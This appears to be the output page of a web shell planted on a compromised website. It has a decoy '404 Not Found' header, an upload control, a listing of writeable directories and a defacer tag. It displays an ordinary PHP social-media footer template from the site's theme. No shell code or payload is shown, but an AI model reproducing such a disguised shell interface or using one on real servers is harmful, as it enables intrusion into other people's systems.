%PDF-1.4 404 Not Found
Sh3ll



Directory :  /var/www/vhosts/lautnusantara.com/httpdocs/web/app/Views/theme/spirit/module/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Current File : /var/www/vhosts/lautnusantara.com/httpdocs/web/app/Views/theme/spirit/module/mod_sosmed.php
<?php
$dt_sosmed = $Sosmed_footer_Model->get_data()->getResultArray();
?>
<style>
.fa.fa-x {
    font-family: sans-serif;
}

.fa.fa-x::before {
    content: "𝕏";
    font-size: 1.2em;
}
</style>
<div class="col-lg-4 col-md-4 col-sm-6">
    <div class="widgets widg_4">
        <h3>Social Media</h3>
        <p>Join and subscribe to our social media.</p>
        <div class="bottom_social">
            <ul class="text-left">
                <?php foreach ($dt_sosmed as $data) { ?>
                <li><a href="<?= $data['url_sosmed'] ?>" target="_blank" aria-label="<?= $data['title'] ?>"><i
                            class="<?= $data['icon'] ?>"
                            style="font-size: 40px;height: 55px;width: 55px;line-height: 55px;"></i></a></li>
                <?php } ?>

            </ul>
        </div>
    </div>
</div>

WonXd677 Sh3LL